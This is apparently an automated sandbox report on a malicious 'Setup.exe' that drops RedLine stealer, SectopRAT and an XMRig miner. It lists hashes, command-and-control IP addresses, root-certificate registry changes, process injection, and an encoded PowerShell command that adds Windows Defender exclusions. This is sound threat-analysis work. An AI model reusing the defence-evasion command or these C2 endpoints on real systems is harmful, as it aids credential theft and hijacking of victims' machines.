redline | 5234a3b9c46390f23a13c401cd294dadc63944ed57a19b26ff4e7211442e0482

Analysis

max time kernel
149s
max time network
138s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
30-06-2024 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

12.5MB
MD5

3ba515e7df4c8918a967f4043cd8c72b
SHA1

3659a765f502297fb92a9d14b08e5b8d91bc8603
SHA256

5234a3b9c46390f23a13c401cd294dadc63944ed57a19b26ff4e7211442e0482
SHA512

010d639a231724425e791afccc7fabacd9b20269665706434c28eba6192af5b424a792755ff1503c0e0afcdd05c5b470d59f57f706f843157c42212e0bb40d8c
SSDEEP

393216:Y9XWBQ/bXZmSUGkVAqYwm9MlpcghwvWLT0Z:Y9GBmZkVAqYweMbIWfo

Score

10^/10

redline sectoprat xmrig mergedall telegramone discovery evasion execution infostealer miner persistence pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

MergedALL

51.195.206.227:38719

Extracted

Family

redline

Botnet

telegramone

163.5.160.27:51523

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\mergedALL.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\fix.exe	family_redline
behavioral1/memory/2632-56-0x0000000000F30000-0x0000000000F80000-memory.dmp	family_redline
behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat
SectopRAT payload 2 IoCs

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\fix.exe family_sectoprat
behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp family_sectoprat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\fix.exe	family_sectoprat
behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp	family_sectoprat

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1556 powershell.exe
2144 powershell.exe
2548 powershell.exe
584 powershell.exe
1204 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 10 IoCs

Processes:

hamburger.exeNotepad.exemergedALL.exeetc test.exeNotepad.exefix.exetubpxzvwmyfr.exeesfowblknspo.exe

pid process

3024 hamburger.exe
2600 Notepad.exe
2632 mergedALL.exe
2104 etc test.exe
2376 Notepad.exe
2396 fix.exe
1148
480
1912 tubpxzvwmyfr.exe
532 esfowblknspo.exe
Loads dropped DLL 13 IoCs

Processes:

Setup.exeNotepad.exeNotepad.exe

pid process

2240 Setup.exe
2240 Setup.exe
2240 Setup.exe
2240 Setup.exe
2240 Setup.exe
2240 Setup.exe
2600 Notepad.exe
2240 Setup.exe
2376 Notepad.exe
1148
480
480
480
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1556	powershell.exe
2144	powershell.exe
2548	powershell.exe
584	powershell.exe
1204	powershell.exe

pid	process
3024	hamburger.exe
2600	Notepad.exe
2632	mergedALL.exe
2104	etc test.exe
2376	Notepad.exe
2396	fix.exe
1148
480
1912	tubpxzvwmyfr.exe
532	esfowblknspo.exe

pid	process
2240	Setup.exe
2240	Setup.exe
2240	Setup.exe
2240	Setup.exe
2240	Setup.exe
2240	Setup.exe
2600	Notepad.exe
2240	Setup.exe
2376	Notepad.exe
1148
480
480
480

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1604-251-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-253-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-252-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-254-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-250-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 8 IoCs

Processes:

hamburger.exepowershell.exetubpxzvwmyfr.exepowershell.exeetc test.exepowershell.exeesfowblknspo.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	hamburger.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	tubpxzvwmyfr.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	etc test.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	esfowblknspo.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

tubpxzvwmyfr.exeesfowblknspo.exe

description	pid	process	target process
PID 1912 set thread context of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 set thread context of 1604	1912	tubpxzvwmyfr.exe	conhost.exe
PID 532 set thread context of 2248	532	esfowblknspo.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

wusa.exewusa.exewusa.exewusa.exe

description ioc process

File created C:\Windows\wusa.lock wusa.exe
File created C:\Windows\wusa.lock wusa.exe
File created C:\Windows\wusa.lock wusa.exe
File created C:\Windows\wusa.lock wusa.exe
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2032 sc.exe
2872 sc.exe
268 sc.exe
2148 sc.exe
2812 sc.exe
2796 sc.exe
1840 sc.exe
308 sc.exe
Detects Pyinstaller 1 IoCs
pyinstaller

Processes:

resource yara_rule

\Users\Admin\AppData\Local\Temp\Notepad.exe pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

pid	process
2032	sc.exe
2872	sc.exe
268	sc.exe
2148	sc.exe
2812	sc.exe
2796	sc.exe
1840	sc.exe
308	sc.exe

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Notepad.exe	pyinstaller

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0268a2d14cbda01	powershell.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

fix.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	fix.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	fix.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	fix.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	fix.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	fix.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	fix.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemergedALL.exefix.exehamburger.exeetc test.exepowershell.exetubpxzvwmyfr.exepowershell.execonhost.exepowershell.exeesfowblknspo.exepowershell.exe

pid	process
1204	powershell.exe
2632	mergedALL.exe
2396	fix.exe
2632	mergedALL.exe
2632	mergedALL.exe
2396	fix.exe
3024	hamburger.exe
2104	etc test.exe
1556	powershell.exe
3024	hamburger.exe
3024	hamburger.exe
3024	hamburger.exe
3024	hamburger.exe
3024	hamburger.exe
1912	tubpxzvwmyfr.exe
2548	powershell.exe
1912	tubpxzvwmyfr.exe
1912	tubpxzvwmyfr.exe
1912	tubpxzvwmyfr.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
2144	powershell.exe
2104	etc test.exe
2104	etc test.exe
2104	etc test.exe
2104	etc test.exe
2104	etc test.exe
532	esfowblknspo.exe
584	powershell.exe
532	esfowblknspo.exe
532	esfowblknspo.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe
1604	conhost.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exefix.exemergedALL.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	2396	fix.exe
Token: SeDebugPrivilege	2632	mergedALL.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeLockMemoryPrivilege	1604	conhost.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

Setup.exeNotepad.execmd.exetubpxzvwmyfr.execmd.execmd.exeesfowblknspo.execmd.exe

description	pid	process	target process
PID 2240 wrote to memory of 1204	2240	Setup.exe	powershell.exe
PID 2240 wrote to memory of 1204	2240	Setup.exe	powershell.exe
PID 2240 wrote to memory of 1204	2240	Setup.exe	powershell.exe
PID 2240 wrote to memory of 1204	2240	Setup.exe	powershell.exe
PID 2240 wrote to memory of 3024	2240	Setup.exe	hamburger.exe
PID 2240 wrote to memory of 3024	2240	Setup.exe	hamburger.exe
PID 2240 wrote to memory of 3024	2240	Setup.exe	hamburger.exe
PID 2240 wrote to memory of 3024	2240	Setup.exe	hamburger.exe
PID 2240 wrote to memory of 2600	2240	Setup.exe	Notepad.exe
PID 2240 wrote to memory of 2600	2240	Setup.exe	Notepad.exe
PID 2240 wrote to memory of 2600	2240	Setup.exe	Notepad.exe
PID 2240 wrote to memory of 2600	2240	Setup.exe	Notepad.exe
PID 2240 wrote to memory of 2632	2240	Setup.exe	mergedALL.exe
PID 2240 wrote to memory of 2632	2240	Setup.exe	mergedALL.exe
PID 2240 wrote to memory of 2632	2240	Setup.exe	mergedALL.exe
PID 2240 wrote to memory of 2632	2240	Setup.exe	mergedALL.exe
PID 2240 wrote to memory of 2104	2240	Setup.exe	etc test.exe
PID 2240 wrote to memory of 2104	2240	Setup.exe	etc test.exe
PID 2240 wrote to memory of 2104	2240	Setup.exe	etc test.exe
PID 2240 wrote to memory of 2104	2240	Setup.exe	etc test.exe
PID 2600 wrote to memory of 2376	2600	Notepad.exe	Notepad.exe
PID 2600 wrote to memory of 2376	2600	Notepad.exe	Notepad.exe
PID 2600 wrote to memory of 2376	2600	Notepad.exe	Notepad.exe
PID 2240 wrote to memory of 2396	2240	Setup.exe	fix.exe
PID 2240 wrote to memory of 2396	2240	Setup.exe	fix.exe
PID 2240 wrote to memory of 2396	2240	Setup.exe	fix.exe
PID 2240 wrote to memory of 2396	2240	Setup.exe	fix.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	wusa.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	wusa.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	wusa.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 2588	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 1604	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 1604	1912	tubpxzvwmyfr.exe	conhost.exe
PID 2320 wrote to memory of 768	2320	cmd.exe	wusa.exe
PID 2320 wrote to memory of 768	2320	cmd.exe	wusa.exe
PID 2320 wrote to memory of 768	2320	cmd.exe	wusa.exe
PID 1912 wrote to memory of 1604	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 1604	1912	tubpxzvwmyfr.exe	conhost.exe
PID 1912 wrote to memory of 1604	1912	tubpxzvwmyfr.exe	conhost.exe
PID 2996 wrote to memory of 2888	2996	cmd.exe	wusa.exe
PID 2996 wrote to memory of 2888	2996	cmd.exe	wusa.exe
PID 2996 wrote to memory of 2888	2996	cmd.exe	wusa.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 532 wrote to memory of 2248	532	esfowblknspo.exe	conhost.exe
PID 1248 wrote to memory of 2256	1248	cmd.exe	wusa.exe
PID 1248 wrote to memory of 2256	1248	cmd.exe	wusa.exe
PID 1248 wrote to memory of 2256	1248	cmd.exe	wusa.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Users\Admin\AppData\Local\Temp\hamburger.exe
"C:\Users\Admin\AppData\Local\Temp\hamburger.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3024

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
